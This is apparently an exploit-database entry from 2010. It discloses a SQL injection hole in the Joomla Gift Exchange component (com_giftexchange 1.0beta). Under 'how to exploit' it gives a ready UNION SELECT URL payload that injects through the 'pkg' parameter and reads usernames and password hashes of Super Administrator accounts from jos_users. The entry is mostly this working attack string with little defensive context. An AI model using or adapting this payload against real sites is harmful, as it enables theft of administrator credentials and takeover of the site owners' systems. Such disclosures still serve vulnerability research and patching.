Joomla Component com_giftexchange (pkg) Sql Injection Vulnerability

2010-03-20T00:00:00
ID 1337DAY-ID-11377
Type zdt
Reporter Chip D3 Bi0s
Modified 2010-03-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Joomla Component com_giftexchange (pkg) Sql Injection Vulnerability 
===================================================================

---------------------------------------------------------------------------------
joomla component Gift Exchange com_giftexchange (pkg) Remote Sql Injection
---------------------------------------------------------------------------------
 
Author          : Chip D3 Bi0s
Group           : LatinHackTeam
Email & msn     : chipdebios[alt+64]gmail.com
Date            : 20 March 2010
Critical Lvl    : Moderate
Impact          : Exposure of sensitive information
Where           : From Remote
---------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
Application     : Gift Exchange
version         : 1.0beta
Developer       : Socialable Studios
Website     : http://extensions.joomla.org/extensions/communities-a-groupware/membership/11680/visit
License         : GPL            type  : Commercial
price       : $25.00 :)
Date Added      : 20 March 2010
Demo            : http://socialables.com/index.php?option=com_giftexchange&view=giftexchange&Itemid=103
 
Download        : http://socialables.com/index.php?option=com_virtuemart&Itemid=91&category_id=28&flypage=flypage.tpl&lang=en&page=shop.product_details&product_id=79&vmcchk=1&Itemid=91
 
---------------------------------------------------------------------------
 
 
how to exploit
 
http://192.168.0.1/index.php?option=com_giftexchange&view=showcase&aj=package&pkg=-1union%20select%201,2,3,4,5,concat_ws(0x3a,username,password)chipD3Bi0s,1,1,1,1,1,1,1,1,1+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72+and+0x41646D696E6973747261746F72--
 
 
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++



#  0day.today [2018-01-03]  #